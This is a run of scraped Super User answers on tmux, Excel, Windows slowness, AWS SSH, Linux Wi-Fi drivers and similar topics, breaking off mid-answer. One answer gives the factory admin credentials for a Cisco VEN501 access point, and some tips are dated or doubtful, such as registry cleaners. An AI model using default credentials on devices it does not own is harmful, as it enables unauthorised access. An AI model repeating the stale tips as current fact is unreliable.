0 You may be able to enter it if you know the ASCII value by holding down the Alt while entering the number from the numeric keypad; e.g. U-umlaut is Alt0220.This works for some characters in CMD prompt, but may need the changes @heavyd references.ShareImprove this answer Follow answered Feb 18, 2015 at 0:29DrMoishe PippikDrMoishe Pippik22.4k44 gold badges3434 silver badges5050 bronze badgesAdd a comment | 
Cisco VEN501-AT wireless access point password
passwords;home-networking;wireless-access-point;dsl;passwords;home-networking;wireless-access-point;dsl
Cisco VEN501-AT wireless access point password Ask Question
2 Found on AT&T Community ForumsPosted Jan 1, 2015 by rdljrCisco VEN501 LoginUsername= ATTadminPassword= 501!VeNShareImprove this answer Follow edited Jun 12, 2020 at 13:48CommunityBot1 answered Jul 2, 2015 at 15:14mechazawA110mechazawA1103622 bronze badges1i was actually wondering, is this AP able to be put into bridge mode? i cannot find an option for it but i need to connect another ap from across my house to it – mechazawA110Jul 2, 2015 at 16:03Add a comment | ; 0 There is no web interface. It is non configurable. It is designed solely for Wireless STBs and that's it. WPS button will not work for a computer either. The WPS button is for first time connection to the STB. However if you had another VEN501 through a different provider (Telus as an example) you can flip the swith in the back to client mode and connect two of more VEN501 together turning it into a wireless bridgeShareImprove this answer Follow answered Mar 10, 2015 at 18:53SqueegisSqueegis11This is simply false. The user/password is ATTadmin/501!VeN and it is configurable like many other wireless access points. The interface looks like those on linksys routers, which isn't surprising since Cisco owned linksys. – lnmaurerMar 10, 2015 at 21:12Add a comment | 
How to completely remove an old installation of java?
windows-7;java;windows-7;java
How to completely remove an old installation of java? Ask Question
2 How do I completely remove an old installation of java?Please try JavaRa:JavaRa is an effective way to deploy, update and remove the Java Runtime Environment (JRE). It can assist in repairing or removing Java when other methods fail. Its most significant feature is the JRE Removal tool; which forcibly deletes files, directories and registry keys associated with the JRE.DisclaimerI am not affiliated with JavaRa in any way, I am just an end user of the software.ShareImprove this answer Follow edited Jul 26, 2015 at 14:07 answered Feb 18, 2015 at 13:28DavidPostill♦DavidPostill149k7777 gold badges343343 silver badges383383 bronze badges0Add a comment | 
Why does this program give a Windows 8 SmartScreen warning?
windows-8;security;malware;malware-detection;windows-8;security;malware;malware-detection
Why does this program give a Windows 8 SmartScreen warning? Ask Question
1 To actually answer, nothing is wrong with the program.Microsoft will only allow well-known (popular/reputable/certified) applications to directly run/install without that warning. Any smaller less known application can generate such a message.ShareImprove this answer Follow answered Feb 18, 2015 at 6:52OvermindOvermind9,76844 gold badges2525 silver badges3737 bronze badgesAdd a comment | 
Formula for COUNTIFS excluding another column
microsoft-excel;worksheet-function;microsoft-excel-2007;microsoft-excel;worksheet-function;microsoft-excel-2007
Formula for COUNTIFS excluding another column Ask Question
2 This is pretty broad, but essentially I think I understand what you're trying to accomplish. Let's take an example spreadsheet like this -Title Tasks Percent Donech1task1 75%ch1task2 50%ch2task3 25%ch2task4 75%ch3task5 50%ch3task6 25%From what I gather, you want a summary of task completion excluding a given chapter.So if you want to count how many tasks exist for a chapter you'd use -=COUNTIF(A2:A7,"<>ch1")Now you know there are 4 tasks that aren't for "ch1".Now, how many of those tasks are greater than 25% done?=COUNTIFS(A2:A7,"<>ch1",C2:C7,">.25")More than 50%?=COUNTIFS(A2:A7,"<>ch1",C2:C7,">.5")How about excluding chapter 3, how many tasks are at least 75% done?=COUNTIFS(A2:A7,"<>ch3",C2:C7,">=.75")ShareImprove this answer Follow answered Feb 18, 2015 at 15:07RaystafarianRaystafarian21.4k1111 gold badges5959 silver badges9090 bronze badgesAdd a comment | 
is it possible to extract all files in a directory to their respective folders?
windows-7;filesystems;cmd.exe;winrar;windows-7;filesystems;cmd.exe;winrar
is it possible to extract all files in a directory to their respective folders? Ask Question
2 WinRAR has a right-click menu command called "extract each archive to separate folder". Select all zip files and right click on any one of them to get this option.ShareImprove this answer Follow answered Feb 17, 2015 at 23:04AlexAlex84244 silver badges99 bronze badges5So they won't have all their contents extract to one folder, right? – CatpersonismeFeb 17, 2015 at 23:06For each archive, it creates a folder with the same name as the archive (without .zip) and extracts there. – AlexFeb 17, 2015 at 23:07Wait, this requires that I go to each one individually, and I'm trying to automate this. – CatpersonismeFeb 17, 2015 at 23:09OK, I just figured it out, I had to select extract archives to sub folders. – CatpersonismeFeb 17, 2015 at 23:13How does one add "Extract each archive to separate folder" to 7-zip's context menu? Thanks. – Andrey KazakOct 28, 2021 at 5:27Add a comment | ; 2 Okay, so how one would do this is as followed: run the winrar GUI executable.Navigate to the collection of files.Select them all.Right click.Select extract to.Select Extract Archives to sub folders.Select OK.ShareImprove this answer Follow answered Feb 18, 2015 at 16:03CatpersonismeCatpersonisme9111 silver badge66 bronze badgesAdd a comment | 
Vi like editing operating system wide? [closed]
macos;vi;macos;vi
Vi like editing operating system wide? [closed] Ask Question
2 The bash shell supports vi-like editing for the command line. Enable it with set -o vi, and set -o emacs to restore the default behavior.The vi mode will enable moded editing of the command-line: the initial state is insert-mode, and pressing Esc will enter command-mode.The set command can be issued from your ~/.bashrc to take effect in all new shells.Note this change will only affect the shell in Terminal, iTerm2, etc., but will not have any impact on other applications.ShareImprove this answer Follow edited Feb 18, 2015 at 17:00 answered Feb 18, 2015 at 15:14zacksezackse62244 silver badges88 bronze badgesAdd a comment | 
How does one swap two panes in Tmux?
keyboard-shortcuts;tmux;keyboard-shortcuts;tmux
How does one swap two panes in Tmux? Ask Question
505 The swap-pane command can do this for you. The { and } keys are bound to swap-pane -U and swap-pane -D in the default configuration.So, to effect your desired change, you can probably use Prefix { when you are in the right pane (or Prefix } if you are in the left pane).The -U and -D refer to “up” and “down” in the pane index order (“up” is the same direction that Prefix o moves across panes). You can see the pane indices with display-panes (Prefix q, by default).ShareImprove this answer Follow answered Feb 18, 2015 at 8:27Chris JohnsenChris Johnsen38.3k66 gold badges107107 silver badges108108 bronze badges337+1 for specifying Prefix instead of assuming everyone will use Ctrl-b – Aaron WallentineOct 5, 2017 at 15:554Agreed. It's even worse when people assume you're using Ctrl-a, since they're the people who know that the prefix can be changed to suit the user. – byxorOct 13, 2017 at 10:46See @kay's response for more general use of swap-pane (and answer to question in title). – JonathanDec 19, 2018 at 19:18Add a comment | ; 103 You can hit Ctrl b and keep holding down Ctrl while hitting o. This will rotate all existing panes around, so in your case it will swap the only two existing panes.Ctrl b + Alt o rotates the opposite way (useful when you have more than two panes).ShareImprove this answer Follow edited Jan 2, 2016 at 10:39 answered Jan 2, 2016 at 10:28joelostblomjoelostblom2,42944 gold badges2020 silver badges2727 bronze badges44Yeah, we're on the same page. But after the first 'o', which does cause a pane rotation, the next 'o' is sent to the underlying shell and processed by whatever app be there. I'm thinking something fishy with my map, or maybe something that's dependent on tmux version. Thanks for responding. – StabledogFeb 14, 2017 at 17:342@Stabledog I'm on tmux 2.3 currently, but I think this has always worked for me... I can't really think of what could be the issue. Sounds strange that the Ctrl+o is being sent to the shell instead of to tmux, especially if this is not the case for repeatedly pressing Ctrl+b (or other tmux commands?). – joelostblomFeb 14, 2017 at 23:45Actually I think it is happening for all commands. At least, I'm not aware of any case where I can do Ctrl+x, hit a key that's bound to some operation, and stay in "tmux keyboard" mode. I just assumed that's by design. – StabledogFeb 15, 2017 at 17:451@Stabledog Actually, I just noticed that the only other command where I can keep holding down control and repeat the other keys is Ctrl+b;, which keeps rotating the cursor between two panes. – joelostblomFeb 16, 2017 at 2:58Add a comment | ; 73 The most precise control you can have is by using the command swap-pane directly. This is not so difficult to do:ctrl-b q shows you the "ID" for each pane in current window - remember the two panes you want to swap. Let's say they're 3 and 5.ctrl-b : to activate the tmux command line. Then issue command swap-pane -s3 -t5.Note that you have auto-completion when typing commands. Also you can search for syntax of a command directly from tmux manpage. That's how I learn the syntax for swap-pane.ShareImprove this answer Follow edited May 28, 2022 at 22:11 answered Mar 21, 2018 at 18:50KayKay1,17111 gold badge1010 silver badges1111 bronze badges0Add a comment | ; 14 To directly swap two panes:Select the first pane with prefix m(the default for prefix is ctrl-b)Go to the second pane, and type prefix :swap-paneShareImprove this answer Follow edited Jun 1, 2022 at 15:48 answered May 18, 2021 at 5:03Miron VeryanskiyMiron Veryanskiy30022 silver badges66 bronze badgesAdd a comment | 
How to hide the one-pixel leftover from the taskbar after activating the “Auto-hide the taskbar” option? [duplicate]
windows-7;taskbar;windows-7;taskbar
How to hide the one-pixel leftover from the taskbar after activating the “Auto-hide the taskbar” option? [duplicate] Ask Question
2 You can't make it go away..It needs a recognition area so it can spring up when you hover your mouse there.It is unrelated to how your screen fits your monitor's resolution, unless you are still on an old CRT screen. LCDs ought to be used at 1:1 pixel resolution for best appearance.You could possibly push your screen into overscan [at some quality loss] but you'd have to find that in the monitor's manual.ShareImprove this answer Follow answered Mar 13, 2015 at 20:28TetsujinTetsujin42.8k77 gold badges9595 silver badges122122 bronze badges0Add a comment | ; 0 As far as i know, that's how it is supposed to work, you can't remove it.A quick Google search pointed me to this software that removes the taskbar on a keypress. Worth a try!ShareImprove this answer Follow answered Mar 13, 2015 at 20:33JoselitoBanzaiJoselitoBanzai5655 bronze badgesAdd a comment | 
openSSL: How to specify the signature hash algorithms I will accept?
hashing;openssl;hashing;openssl
openSSL: How to specify the signature hash algorithms I will accept? Ask Question
2 (Found researching something else. I don't know if security, or even SO, would be better.) In release 1.0.2 (only) there are new SSL_[CTX_]set1[_client]_sigalgs[_list] for this. I've seen no doc in any release yet, but it apparently is in "master" (i.e. the development "trunk") on the website at https://www.openssl.org/docs/manmaster/ssl/SSL_CTX_set1_sigalgs.html so presumably it will be in future releases.In earlier versions you can set a verify callback, or just check the result chain, and reject any cert or chain using MD5, or RSA<=1024, or ECC using curves suspected of NSA backdoors, or anything else you dislike, such as CA policy that says "we hate cats".ShareImprove this answer Follow answered Oct 23, 2015 at 0:53dave_thompson_085dave_thompson_0852,81011 gold badge1414 silver badges1717 bronze badgesAdd a comment | 
How do I troubleshoot a Windows freeze or slowness?
windows;performance;troubleshooting;windows;performance;troubleshooting
How do I troubleshoot a Windows freeze or slowness? Ask Question
36 Assuming you are using a Windows OS...Things to check:PC has 10% at least of free disk spacePC has at least 1 GB of RAM for Windows XP and 2 GB for Windows VistaIf there are any hanging programs or drivers.Corrupt system files. If that is so, run sfc /scannow in cmd and let it replace any corrupt system files. It may ask for your Windows CD. Or, if it is seriously damaged then perform a Windows XP repair install or Windows Vista repair installA badly corrupted file system. This is from experience rather than knowledge.Run chkdsk /r in the command prompt.Due to the way Windows handles files, it will in inevitably get slow over time. Your MFT structure gets bigger and bigger over time. The only cure is a fresh install.Malware. Download and run HijackThis, and then post the log here. It'll give us a decent idea of what's running and what could be hogging all your memory/CPU.ShareImprove this answer Follow edited Apr 18, 2015 at 13:37 community wiki 4 revs, 4 users 71%Blam923Are you sure about your defrag comment? I recently defragged an NTFS file system that was very well used, almost full and had not been defragged in many years and noticed a huge performance improvement. Perhaps the "no difference" comment applies to the most common cases where a disk is generally underutilised? – luapyadAug 23, 2009 at 4:291Defragmentation will run once a week on schedule anyway but yes, obsessive-compulsive defragmenting won't be of much use. If anything one only wastes time. Also, if you don't fill your disk further than like 75 percent it's unlikely fragmentation ever causes a performance problem. – JoeyAug 24, 2009 at 14:534WRT defrag, it depends. I used to daily work in an app that depended upon two files, one ~65MB in size and another ~2GB in size. When that app became "really slow", I went and ran a defrag analysis and discovered that, usually, one/both of those files were ~85% fragmented. After running defrag, the app sped up significantly. – J. PolferAug 24, 2009 at 15:014"Due to the way Windows handles files, it will in inevitably get slow over time." -> Do you have any reference for that? I know NTFS uses a MFT structure, but I never heard that this will necessarily always cause Windows to become slower. – sleskeDec 9, 2010 at 21:582I know this is old, but does anyone have reference to the "inevitable" slowing down of Windows due to MFT structure (with the only cure being a reformat)? I don't understand how it would only be a "one way street", with the only solution being a complete wipe and reinstall. It was my understanding that the days of "annual" Windows reformats to keep things snappy went away with the XP-era. – ColdblackiceJul 4, 2013 at 8:44 | Show 4 more comments; 38 Most system freezes (where you can't use hot-keys like CTRL+ALT+DEL) are caused by hanging drivers,so you will have to either replace the device or update the driver. Troubleshooting can be done:Download Windows Performance Analyzer for your Windows version.Install the software on your system.Open a command prompt as administrator, and copy paste the next command:xperf -start perf!GeneralProfiles.InBuffer && timeout -1 && xperf -stop perf!GeneralProfiles.InBuffer myTrace.etlPress ENTER once to start the command, now you will have to wait till your system hangs.You can do whatever you want to. Please no heavy activity like gaming or private things...Right after your system stops hanging you go to the console and press ENTER. After waiting some time a log file myTrace.etl will be produced, compress this to a zip file.Put this compressed version of the file somewhere online (perhaps 2shared).Share the link here, I will do an attempt to find and show you the cause of your problem. OR troubleshoot the trace yourself using instructions found here, start with step 6 - 7.ShareImprove this answer Follow edited Oct 14, 2018 at 21:49 community wiki 7 revs, 2 users 96%Tom Wijsman910This doesn't scale very well, having people just upload an xperf trace. Is there any way you could edit this to include some info on how people can use that information to debug the system themselves? – nhinkleJan 5, 2012 at 6:241@nhinkle: This outlines the program out in a bit of detail, however it boils down to just opening the trace and looking around. If a person isn't smart enough of actually doing some self study on the things seen there, he should probably not be debugging traces. Debugging is really something you should use Google extensively for. When a program crashed, I can see the data that was on the stack. Can you? Of course one can ask how a specific thing exactly works or what a specific things means. – Tamara WijsmanJan 5, 2012 at 11:24But in general, you are on your own. Writing a complete guide on how to use XPerf would detriment away from the intention of this post, which is to get the actual problem resolved. Please note that a compressed Xperf trace is very small, so it does scale very well compared to crash dumps. And oh well, those would even be harder to explain how to debug them (it requires a good understanding of the internals of a computer). Google is your friend, if you read documentation you can even access it from a Memory window. – Tamara WijsmanJan 5, 2012 at 11:301Also, it depends from case from case what you have to look for. One time, I'm walking down the stack tree of a process to find out that a firewall is messing up my Visual Studio debugger. Another time, I just look at the DPC calls for someone that send me a dump through a mail, another time I look for the biggest I/O consumer for someone on the SU chat. You need an understanding to actually know what you need to look for, if I need to cover most of these cases I would have the longest post on SU. Although most of that can otherwise be reached by simply researching and learning. – Tamara WijsmanJan 5, 2012 at 11:40However, feel free to ask a question on the actual use of XPerf as well as a community wiki that summarizes what to do when specific cases arise. It might help as a start for beginners that don't have a clue what they are doing. However, I currently don't have the time and willingness to do this here and now.... Excuse me for the length of my comments, but I thought a single comment is insufficient to get the idea. – Tamara WijsmanJan 5, 2012 at 11:42 | Show 4 more comments; 33 First off, I check what is automatically started when the machine boots up.AutorunsRegistry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunmsconfigRun -> services.msc This will list all the services that are started up when your machine turns on. You can manage all of them here from this MMC snap-in.Scheduled TasksI will then run process explorer and see what is running after it is booted and see what hogs up a lot of memory and CPU.Process ExplorerProcess MonitorTask ManagerI will then make sure all the drivers are up to date, same with anti-virus, windows update and other critical applications such as web browsers, java, flash, etc.Java RuntimeFlash PlayerThen I will defrag their hard drive if it needs to be done. Disk DefragSometimes I will clear out their web browser history and cookies and also clean out their temp folders.CCleanerDisk CleanupI will also look through the event viewer to see if there are any errors being reported and check into them if they do.Event ViewerIf all else fails and the system will support it, a RAM upgrade may be in order.ShareImprove this answer Follow edited Oct 9, 2012 at 20:40 community wiki 6 revs, 3 users 83%qroberts0Add a comment | ; 20 (assuming for a moment, we are talking about Windows)If your computer is suddenly running slow (i.e. you don't just have a slow computer), I would check the Windows Task Manager. Type Ctrl-Alt-Delete to bring up the Task Manager. Select the 'Processes' tab at the top to bring up the list of all processes running on the computer.Click on the 'CPU' column at the top of the process window... twice (to sort processes with max CPU usage first).See if anything (other than "System Idle Process") is taking more than a few percent CPU consistently.Virus scanners or other background services can sometimes become overzealous in using system resources. Sometimes an application can enter a race condition where it gets "stuck" in some loop of code it just runs continuously. Then, sometimes, you just have some application you forgot about taking up all your CPU time. The Task Manager should tell you if anything like this is going on.ShareImprove this answer Follow answered Aug 21, 2009 at 0:33 community wiki Robert Cartaino 21I'd also google any processes you're unsure of to confirm if they are needed/necessary and then use msconfig/HiJackThis to stop them starting up. – Umber FerruleAug 23, 2009 at 11:252MSCONFIG is not a startup manager but a troubleshooting utility and therefore better left alone. HiJackThis i don't trust anymore since TrendMicro laid their hands on it. – Molly7244Sep 16, 2009 at 23:08Add a comment | ; 11 In this order usually...Hardware - Hardware is the fastest and easiest thing to check that is usually the culprit. Memory is cheap these days, seeing people that still have 128 MB and 256 MB installed makes me want to cry. With Moore's law being so apparent in the hardware world, CPUs that are still blazing fast and can be bought very cheap as well.Software clutter - the amount of software installed and running upon system startup impacts performance big time. There may also be malicious software slowing you down.Updated drivers - these can give your machine big performance boosts.A good pass of a defragmentation program, CCleaner, and a virus scannner and malware scanner is beneficial as well.ShareImprove this answer Follow edited Aug 4, 2014 at 17:44 community wiki 2 revs, 2 users 60%John TAdd a comment | ; 7 To see if your machine is going to be slow, check Amount of memory Speed of CPUDisk space availableThere are many third-party tools available that give you information on your computer, but to do this quite easily without those you can use the Windows Task Manager.To open "Task Manager"In the task bar, right click the mouse then select "Task Manager"On the performance tab you will see how 'busy' your CPU is also how much physical memory is available.If CPU is consistently above 10% and there is less than 500000 K of memory available your machine is probably going to be running slowly.Also if your hard drive is full, this could lead to poor performance. You should aim to have at least 15% of free space.To check this, open Windows Explorer, you can do this byAt the same time, press the windows Key followed by the letter eSelect the C: drive with a mouse click. Then right click and select properties - this will tell you how much free/used space you have on your hard drive.ShareImprove this answer Follow edited Aug 4, 2014 at 17:45 community wiki 4 revs, 2 users 87%Paul RowlandAdd a comment | ; 6 Not without knowing what is causing the freezing as it is not actually causing a crash.This sounds like at first guess that it is a hardware interrupt / bad device driver causing this, as for banging the keyboard - this is most likely just down to luck.Try first looking through your system event log for any errors or warnings that could be driver related.Next either uninstall the driver or if you do not find anything, I would first advise unplugging all extra USB devices as the easiest solution, then if that solves it, plug them in one by one until you find the bad one. If you do not find anything, you may actually need to uninstall drivers.If you still have errors or want to rule it out earlier, I would advise running a memory test, and going to the command prompt to run a Chkdsk to scan the hard drive for problems.I used to get this all the time on old machines, 99% of the time it was people buying cheap/unknown brand devices with VERY bad drivers - it gives Windows a bad name. If however you still getting problems after following this, please say and I will try to help further.ShareImprove this answer Follow answered Oct 30, 2010 at 22:43 community wiki William Hilsum Add a comment | ; 5 Defragment your hard drive. For Windows XP Disk Defragmenter is located atStart -> Programs -> Accessories -> System tools.For Windows 7 or Vista see this question.ShareImprove this answer Follow edited Mar 20, 2017 at 10:04 community wiki 3 revsVladimir GrigorovAdd a comment | ; 5 For another speed boost, disable unnecessary Windows services. There are a few well-trusted databases on what's safe to disable and what's not, for example, The Elder Geek's Services Guide for Windows XP.ShareImprove this answer Follow edited Aug 4, 2014 at 17:53 community wiki 2 revs, 2 users 67%Peter MortensenAdd a comment | ; 4 In addition to the other suggestions here, I have found that simply emptying the Recycle Bin can make a difference to performance, if I have been filling it with large collections of files.ShareImprove this answer Follow answered Aug 23, 2009 at 7:30 community wiki Bill Karwin Add a comment | ; 4 Personally, I go with the following:Open Task-manager and sift through all running processes jotting down those that are unncessary and taking special care to check for any suspicious proceses. 99.9% of the time, if you don't recognize a process, just type the name into google and you will get ample information about the nature of the process and wether it's necessary or not.With the list of procceses in mind, I open up msconfig (type msconfig in the run dialog) and in the start-up tab start unchecking those proccesses that are not neeed in the background. Take care disabling different startup items as sometimes these rely on each other.Go to Control Panel and once again sift through installed software and uninstall those which the user doesn't need.I then go through the Services that are running (type services.msc in the run dialog) and either set them to disable or manual depending on the service.I run a full antivirus and spyware scan on the system and restart.Now, if the computer hasn't speeded up somewhat, I recommend them to simply let me format the system and start over clean. Because of the nature of windows and all the junk that inevitably forms over years of use, this is usually the only viable solution.Good luck!ShareImprove this answer Follow answered Dec 9, 2010 at 19:32 community wiki akseli Add a comment | ; 3 I always check the following...RAM. Modern OSes are RAM-hungry and the more you have the better off they are. Hard drive space. Modern OSes are hard drive hungry and the more you have the better off are.Background processes (e.g. open applications, disk scanning software, virus software, viruses themselves). The more gadgets, widgets, applications, etc., the slower things will be overall. Only keep open what really needs to be open. Time between reboots. Every OS needs to be rebooted every once in a while.ShareImprove this answer Follow answered Aug 21, 2009 at 0:14 community wiki Philip Regan Add a comment | ; 3 Assuming a machine used to be running fast, and is now running slow (and it isn't Linux based)....Restart the machineCheck for viruses and other malware first.Open Task Manager (or the equivalent) and see what application is monopolizing the CPU or doing a lot of harddrive writes/reads. I may close/kill the app or I would google it and see what the other complaints/solutions are for it.ShareImprove this answer Follow answered Aug 21, 2009 at 0:41 community wiki Will Add a comment | ; 3 Other options to consider are:Malwarebytes Anti-MalwareRaising the amount of virtual memory used by the system This how to geek guide shows that disk cleanup doesn't really clean-up everything unless you perform a registry tweak. The guide shows how to fix that. Finally a reinstall of the OS is my final option. Windows likes to keep a lot of crapShareImprove this answer Follow edited Dec 9, 2010 at 19:58 community wiki 2 revs, 2 users 89%KronoSAdd a comment | ; 2 That sounds like an unusual circumstance (as many people experience little trouble day-to-day with Windows 7 and your issue sounds quite inconvenient).Could you provide more detail? Is this a "new" new PC or just one that is new to you (i.e. second hand with Windows 7 newly installed)? Do you know the specification of the PC? Does the problem happen regularly in normal use, intermittently with no obvious pattern, or at specific times like shortly after start-up?In the absence of more information, a first stab at somewhere to look for the cause of the issue is to check that you drives are healthy by querying their SMART status paramaters with a tool like http://gsmartcontrol.berlios.de/ (available for both Linux and Windows - there are numerous other utilities with similar abilities if this doesn't work well on your PC). A failing drive is quite a common cause of unexpected pauses, as for certain faults the drive will cycle retrying until it manages to read/write what it has been asked to read/write and the user interface seem to hang until the OS gets a response from the drive.Also check the Windows event logs for around the time(s) the issue is apparent. Most hardware drivers will report unexpected conditions there and Windows itself will report certain driver errors there that the drivers themselves fall over before reporting (older Windows variants would just bluescreen in such circumstances, but newer releases will try restart drivers and log the event when an otherwise "fatal" error condition occurs) - so if the problem is caused by an errant driver or faulty hardware those logs may give useful clues.ShareImprove this answer Follow answered Oct 30, 2010 at 22:53 community wiki David Spillett 4It is a new PC (not refurbished). There doesn't seem to be any pattern. Hitting the windows key enables the system to operate again until the next time it freezes – Jason MartinNov 1, 2010 at 22:51Could it be a problem with the machine trying to go into sleep or hibernate mode, and failing? Check your event logs around the time the machine pauses or the time you manage to unpause it for errors/warnings/messages regarding this (or other issues). Also check your power management settings to see if the machine is set to sleep/hibernate (uncommon but not completely unheard of for desktop machines). – David SpillettNov 2, 2010 at 0:38Can you please provide steps to access the event log in windows 7? – Jason MartinNov 4, 2010 at 3:28I don't have a Windows 7 install anywhere to check, but under Vista just typing "event" into the start menu brings up "Event Viewer" which opens the relevant admin snap-in and it is also available under Computer Management in control panel. – David SpillettNov 4, 2010 at 14:07Add a comment | ; 2 In case of Windows, install only those software which you need. Don't mess up your PC with all useless stuff. Check for registry errors and fix them using a good software like regcure or registry booster. Don't forget to check whether your antivirus is updated or not. Outdated antivirus often tends to slow down the system. Use CCleaner to remove the crap. Don't exhaust your RAM by using too many programs in background. Turnoff Windows sidebar or desktop enhancement software if you don't need them. Scan all system by updated virus to make sure it is not infected. Also disk defrag etc. small utilities can be helpful for your PC. ShareImprove this answer Follow edited Oct 10, 2011 at 17:16 community wiki 2 revs, 2 users 67%jack.spicerAdd a comment | ; 0 One of the causes of the slowdown, especially at startup, can be Windows trying to restore connection with network share.Configure Registry to prevent it:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider]"RestoreConnection"=dword:00000000If there's a performance problem, disable all the unneeded services and startups, use a lightweight browser (see memory usage), disable Aero theme, etc.If you suspect malwares have infected your PC, it is advisable to format you're drive (and not trying to clean it).Also, USB pendrives can prevent the system to boot. Unplug them.ShareImprove this answer Follow edited May 24, 2017 at 21:45 community wiki 2 revs, 2 users 86%user425154 Add a comment | 
Amazon Web Service (AWS) VPC private subnet instance 'Permission denied (publickey).' - ssh from osx
ssh;amazon-ec2;amazon-web-services;ssh;amazon-ec2;amazon-web-services
Amazon Web Service (AWS) VPC private subnet instance 'Permission denied (publickey).' - ssh from osx Ask Question
0 As per this answer and this guidelineI needed to add the key_pair.pem to the OSX ssh agent as follows: ssh-add -K /path/to/key_pair.pem(in my case it didn't ask for a passphrase)After this, everything worked fine using both methodologies outlined above.So to answer the question: Q: Do I have to use ssh-agent on Mac OS X to log in to a private subnet instance through a NAT/bastion host?A: YESShareImprove this answer Follow edited Apr 13, 2017 at 12:14CommunityBot1 answered Mar 13, 2015 at 23:57goredwardsgoredwards11944 bronze badgesAdd a comment | ; 0 For me it helped to remove the bastion's (NAT instance's) public key from ~/.ssh/known_hosts.If the key of the remote bastion host changed (which may happen quite often if you allocate EIPs to new instances) and in addition have StrictHostKeyChecking no set in your ssh_config, AgentForwarding will be disabled on the bastion host.You'll also find a warning saying so if you login to the bastion host. For my part, I've just not read it -.- So, delete the key and connect again, the current key will be added to the known_hosts file and you'll be able to connect to the instance in the private subnet.ShareImprove this answer Follow answered Jan 27, 2019 at 18:15rflumerflume10111 bronze badgeAdd a comment | 
Install apache2-dev for mod_wsgi
debian;apache-http-server;python;django;debian;apache-http-server;python;django
Install apache2-dev for mod_wsgi Ask Question
2 I think that apache2-dev is a virtual package provided by apache2-threaded-dev. Installing that should get you what you need.ShareImprove this answer Follow answered Mar 13, 2015 at 19:45Tom DamonTom Damon46633 silver badges77 bronze badges1Thank you. It indeed got me apxs2 but I could not compile the mod_wsgi source anyway. In the end I installed the package libapache2-mod-wsgi recommended by this troubleshooting tutorial. – Johan GovMar 16, 2015 at 6:24Add a comment | 
Issues with internet after sleep mode
windows-7;windows;internet;connection;sleep;windows-7;windows;internet;connection;sleep
Issues with internet after sleep mode Ask Question
3 I Turned the power setting OFF (i.e. UNCHECKED the "turn off the device to save power" setting) and it is now working fine.To answer Scott's comment and anyone looking for this setting, this is how to reach it:Device ManagerNetwork adaptersDouble-click the adapter pertaining to the networkconnection of interestClick the Power Management TabUNCHECK "Allow the computer to turn off this device to save power"This is the same answer Brian gave the next day. I am performing some tests to see if it speeds up reconnection to the Internet after waking up from sleep.ShareImprove this answer Follow edited Jul 31, 2017 at 15:28simlev3,69733 gold badges1313 silver badges3333 bronze badges answered Jul 23, 2017 at 7:05SriSri3122 bronze badges21Where is that setting? Please do not respond in comments; edit your answer to make it clearer and more complete. – Scott - Слава УкраїніJul 23, 2017 at 8:01This is the correct answer. Unchecking the box prevents the adapter from being put to sleep. Otherwise the adapter will need to refresh itself by going through the DHCP process and requiring a new dynamic IP address each time it wakes up. Same thing as performing an IPCONFIG / RENEW at the command prompt. While unrelated to the primary issue, it may also be worthwhile to check the Advanced Power Settings from the Control Panel and ensuring that the wireless adapter is set to max performance. – Josh CampbellMay 17, 2018 at 22:37Add a comment | ; 1 I had the same problem as described with my girlfriends laptop last year. I fixed it by going to the network connections folder, and adjusting the properties of the wireless network connection. In properties, select configure. And then under power management, make sure that the computer is allowed to turn off the device to save power. Seems counter-intuitive, but that's what it was.Hopefully it's the same for you. Good luck.ShareImprove this answer Follow answered Mar 13, 2015 at 18:527d77d71111 bronze badge51A gave this a +1, however it may only be 'partially' correct. This area is almost certainly the cause of the OP's issue, however I have experienced the same scenario in the past, but only after 'enabling' this setting to allow the device to be turned off. I turned this feature back 'off' and the issue was resolved. The cause of my internet taking so long to reactivate was due to power management shutting it off. Obviously, it takes a few minutes for the NIC to reconfigure itself every time it comes back on. Make sure this feature is 'disabled'. – Josh CampbellMar 13, 2015 at 19:09OK, for now it seems to be working, i'll give it a couple of days then set the question as answered – Ruben FernandesMar 14, 2015 at 19:35update, this morning i had the same issue again, it seems that it didn't fix it :( – Ruben FernandesMar 19, 2015 at 11:42@JoshCampbell I had the same issue and "disabling" the setting (AKA un-checking the box) resolved it. Do you think it would be correct to edit the answer because the OP made a typo? – GuyMar 5, 2018 at 22:01Actually Sri's answer is the correct one. And well written I might add. Looking at this now, I'm not really sure why I didn't correct it back in 2015. Sorry, must have been pressed for time. – Josh CampbellMay 17, 2018 at 22:32Add a comment | ; 1 To access the "Network Connections" folder, click on the Windows Start button and enter "Network Connections" in the search field. Select "View Network connections. Right click on one of the connections listed, choose "Properties." In the window that appears, click on the "Configure" button. Then click on the "Power Management" tab. Deselect the checkbox for "Allow computer to turn off..."If the checkbox is already deselected, selecting it and pressing OK, then returning to deselect it may fix your problem.However, as suggested in other comments, this may or may not fix your particular problem.ShareImprove this answer Follow answered Jul 24, 2017 at 1:02BrianBrian1111 bronze badgeAdd a comment | 
Intel Wireless WiFi driver for Linux on Dell Inspiron 17 (7746, Early 2015) CentOS 7 Laptop
linux;drivers;centos;dell-inspiron;wifi-driver;linux;drivers;centos;dell-inspiron;wifi-driver
Intel Wireless WiFi driver for Linux on Dell Inspiron 17 (7746, Early 2015) CentOS 7 Laptop Ask Question
2 Edit:I do not recommend updating CentOS 7 to kernel-ml, as it has a lot of stability issues that can result (specifically, virtualization is not functioning properly). What I found as a better solution was to look into "Backport" for the Linux kernel.Visit: https://backports.wiki.kernel.org/index.php/Main_PageThey have a temporary download page, so I don't want to link directly to that in this question since I imagine it'll eventually go away. Download that releaase:tar xf backports-3.19-rc1-1.tar.xzcd backports-3.19-rc1-1make defconfig-iwlwifisudo make installI rebooted, and everything seems to be working. No need to update to kernel-ml.Old answer follows (this also works but you'll no longer be on the CentOS mainline):So I tried a few things trying to stay "official" such as updating my kernel to the ML release from ELREPO, and installed the additional firmware with linux-firmware package. What I ended up having to do was visit:https://wireless.wiki.kernel.org/en/users/drivers/iwlwifi#firmwareWhich published the latest firmware updates.Turns out those firmware headers are actually in the latest kernel-ml headers, they just didn't exist in my /lib/firmware folder.So I downloaded the Intel® Wireless 7265 tarball from https://wireless.wiki.kernel.org/_media/en/users/drivers/iwlwifi-7265-ucode-23.15.10.0.tgz (there's a table on this page with other latest drivers as well) and just followed the step to copy them into /lib/firmware# cp iwlwifi-*.ucode /lib/firmwareRebooted the laptop, and everything worked!ShareImprove this answer Follow edited Mar 